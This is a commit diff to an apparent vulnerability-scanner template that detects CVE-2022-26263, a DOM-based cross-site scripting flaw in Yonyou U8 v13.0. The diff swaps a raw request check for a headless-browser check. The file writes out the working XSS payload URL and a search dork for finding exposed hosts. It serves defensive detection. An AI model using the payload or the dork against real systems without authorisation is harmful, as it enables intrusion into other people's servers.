Update CVE-2022-26263.yaml

cves/2022/CVE-2022-26263.yaml

@@ -2,7 +2,7 @@ id: CVE-2022-26263
 
 info:
   name: Yonyou u8 v13.0 - Cross Site Scripting
-  author: edoardottt
+  author: edoardottt,theamanrawat
   severity: medium
   description: |
     Yonyou u8 v13.0 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability via the component /u8sl/WebHelp.
@@ -12,30 +12,18 @@ info:
   classification:
     cve-id: CVE-2022-26263
   metadata:
+    verified: true
     google-dork: inurl:/u8sl/WebHelp
-  tags: cve,cve2022,xss,yonyou
+  tags: cve,cve2022,yonyou,xss
 
-requests:
-  - raw:
-      - |
-        @timeout: 10s
-        GET /U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,"'"><xsstag>()locxss")#javascript:alert(document.domain) HTTP/1.1
-        Host: {{Hostname}}
+headless:
+  - steps:
+      - args:
+         url: '{{BaseURL}}/U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,"%27"><xsstag>()locxss")#javascript:console.log(document.domain)'
+        action: navigate
+      - action: waitload
 
-    matchers-condition: and
     matchers:
       - type: word
-        part: body
         words:
-          - "<FRAME SRC='Welcome.htm' name='bsscright' scrolling='yes'>"
-          - "<META NAME=\"generator\" CONTENT=\"RoboHELP by eHelp Corporation www.ehelp.com\">"
-        condition: and
-
-      - type: word
-        part: header
-        words:
-          - "text/html"
-
-      - type: status
-        status:
-          - 200
+          - '<frame src="javascript:console.log(document.domain)"'